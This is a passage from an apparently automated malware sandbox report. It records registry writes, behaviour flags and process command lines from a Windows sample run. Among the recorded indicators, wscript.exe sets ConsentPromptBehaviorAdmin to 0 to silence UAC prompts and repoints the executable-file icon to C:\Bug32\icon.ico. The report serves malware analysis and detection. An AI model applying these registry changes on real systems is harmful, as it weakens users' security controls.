Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\ = "&Play with Windows Media Player" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\command C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\ = "&Play with Windows Media Player" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shellex\ContextMenuHandlers\PlayTo C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{17FC1A80-140E-4290-A64F-4A29A951A867}\ = "Open Media Sharing Handler" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\ = "&Play with Windows Media Player" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\command C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\ = "&Add to Windows Media Player list" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shellex\ContextMenuHandlers\PlayTo C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shellex\ContextMenuHandlers\PlayTo C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\command C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\ = "&Play with Windows Media Player" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\ = "&Add to Windows Media Player list" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\command C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\command C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{A45AEC2B-549E-405F-AF3E-C6B03C4FDFBF}\ = "Toggle DMR Authorization Handler" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\command C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\ = "&Add to Windows Media Player list" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\ = "&Play with Windows Media Player" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shellex\ContextMenuHandlers\PlayTo C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{17FC1A80-140E-4290-A64F-4A29A951A867} C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{A45AEC2B-549E-405F-AF3E-C6B03C4FDFBF} C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\command C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico" C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shellex\ContextMenuHandlers\PlayTo C:\Windows\system32\unregmp2.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\System32\wscript.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1208 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe
PID 1892 wrote to memory of 3168 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2644 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 2036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1892 wrote to memory of 1848 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\system32\wscript.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\System32\wscript.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\wscript.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe

"C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe"

C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe

C:\2d1a5f6ae1e78fa0c8bf8beaee61\\Setup.exe /x86 /x64 /ia64 /web

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb9c1ab58,0x7ffcb9c1ab68,0x7ffcb9c1ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4360 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4516 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4576 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4848 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4612 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4964 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4740 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2596 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4848 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=1656 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3260 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4332 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4588 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3104 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5124 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5496 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3176 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3116 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5600 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5664 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6012 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5960 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6112 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6016 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=5348 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=5236 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5132 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5524 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5476 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=5524 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

